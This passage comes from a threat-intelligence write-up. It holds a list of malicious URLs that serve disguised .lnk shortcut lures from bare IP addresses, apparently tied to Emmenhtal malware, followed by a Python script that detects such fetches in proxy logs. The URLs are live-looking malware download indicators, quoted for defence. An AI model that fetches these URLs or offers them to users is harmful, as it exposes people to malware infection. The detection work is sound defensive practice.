http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk |
URL |
http://147.45.79.82/Downloads/qqeng.pdf.lnk |
URL |
http://151.236.17.180/Wire%20Confirmation/WireConfirmation.pdf.lnk |
URL |
http://206.188.196.28/Downloads/example.lnk |
URL |
http://62.133.61.101/Downloads/Invoice.pdf.lnk |
URL |
http://62.133.61.104/Downloads/test.pdf.lnk |
URL |
http://62.133.61.37/Downloads/config.txt.lnk |
URL |
http://62.133.61.73/Downloads/Photo.lnk |
URL |
http://89.23.103.56/Downloads/Videof/Full%20Video%20HD%20%281080p%29.lnk |
URL |
http://89.23.107.244/Downloads/Test.lnk |
URL |
http://89.23.107.67/Downloads/2023-Documents%20Shared.lnk |
URL |
http://91.92.243.198:81/Downloads/test.lnk |
URL |
http://91.92.251.35/Downloads/solaris-docs.lnk |
URL |
http://92.118.112.253/Downloads/releaseform.pdf.lnk |
URL |
http://94.156.64.74/Downloads/SecretTeachings.pdf.lnk |
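
The URL indicators share a shape that is easy to turn into a detection: a .lnk fetched from a bare IP address, usually under /Downloads/ and often disguised with a document extension. The following is an added example, not code from the Sekoia.io report: it breaks a URL into those features, decides whether it looks like one of these lures, and runs the rule over constructed proxy log lines, also flagging the WebDAV PROPFIND directory listing that a Windows client issues to such a share before fetching the shortcut. LURE_URLS copies the URL indicators above; the log lines and the benign URLs are constructed.

```python
"""Flag Emmenhtal-style LNK lure fetches: shortcut files served from bare IP
addresses under a /Downloads/ path, often with a double extension.

Added example, not code from the Sekoia.io report.  LURE_URLS copies the URL
indicators above; the proxy log lines and benign URLs are constructed.
"""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

LURE_URLS = [
    "http://147.45.50.214/Downloads/demo.pdf.lnk",
    "http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk",
    "http://147.45.79.82/Downloads/qqeng.pdf.lnk",
    "http://151.236.17.180/Wire%20Confirmation/WireConfirmation.pdf.lnk",
    "http://206.188.196.28/Downloads/example.lnk",
    "http://62.133.61.101/Downloads/Invoice.pdf.lnk",
    "http://62.133.61.104/Downloads/test.pdf.lnk",
    "http://62.133.61.37/Downloads/config.txt.lnk",
    "http://62.133.61.73/Downloads/Photo.lnk",
    "http://89.23.103.56/Downloads/Videof/Full%20Video%20HD%20%281080p%29.lnk",
    "http://89.23.107.244/Downloads/Test.lnk",
    "http://89.23.107.67/Downloads/2023-Documents%20Shared.lnk",
    "http://91.92.243.198:81/Downloads/test.lnk",
    "http://91.92.251.35/Downloads/solaris-docs.lnk",
    "http://92.118.112.253/Downloads/releaseform.pdf.lnk",
    "http://94.156.64.74/Downloads/SecretTeachings.pdf.lnk",
]


def analyse_url(url: str) -> dict:
    """Break a URL into the features that characterise the lures above."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        bare_ip = True
    except ValueError:
        bare_ip = False
    path = unquote(parts.path)                 # %20 -> space, %28 -> '('
    filename = path.rsplit("/", 1)[-1]
    exts = filename.lower().split(".")[1:]     # 'Invoice.pdf.lnk' -> ['pdf', 'lnk']
    return {
        "filename": filename,
        "is_lnk": bool(exts) and exts[-1] == "lnk",
        "double_extension": len(exts) >= 2 and exts[-1] == "lnk",
        "bare_ip_host": bare_ip,
        "nonstandard_port": parts.port not in (None, 80, 443),
        "downloads_path": path.lower().startswith("/downloads/"),
    }


def is_lnk_lure(url: str) -> bool:
    """A .lnk fetched from a bare IP, or one hiding behind a document
    extension, is treated as a lure.  A plain .lnk from a named internal
    host is left alone so the rule stays quiet on ordinary file-share use."""
    f = analyse_url(url)
    return f["is_lnk"] and (f["bare_ip_host"] or f["double_extension"])


# 'METHOD URL' as most proxy logs record it; PROPFIND is the WebDAV listing.
LOG_RE = re.compile(r"\b(GET|POST|PROPFIND|OPTIONS)\s+(\S+)")


def scan_proxy_log(lines) -> list:
    """Return (url, reason) for every line worth an analyst's attention."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        method, url = m.group(1), m.group(2)
        if is_lnk_lure(url):
            hits.append((url, "lnk lure"))
        elif method == "PROPFIND" and analyse_url(url)["bare_ip_host"]:
            hits.append((url, "WebDAV listing from a bare IP"))
    return hits


# Constructed proxy log: one lure fetch, one benign PDF, then a WebDAV
# listing of a share followed by the shortcut fetch from it.
SAMPLE_PROXY_LOG = """\
2024-09-10T08:12:01Z 10.0.0.5 GET http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk 200
2024-09-10T08:12:03Z 10.0.0.5 GET https://www.example.com/docs/report.pdf 200
2024-09-10T08:13:40Z 10.0.0.7 PROPFIND http://91.92.243.198:81/Downloads/ 207
2024-09-10T08:13:41Z 10.0.0.7 GET http://91.92.243.198:81/Downloads/test.lnk 200
"""

if __name__ == "__main__":
    for url, why in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(f"{why:30} {url}")
```

All sixteen listed URLs satisfy is_lnk_lure, while a PDF from a named host and a .lnk on a named internal file server do not; the PROPFIND check catches the share enumeration even when the shortcut name is new.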
|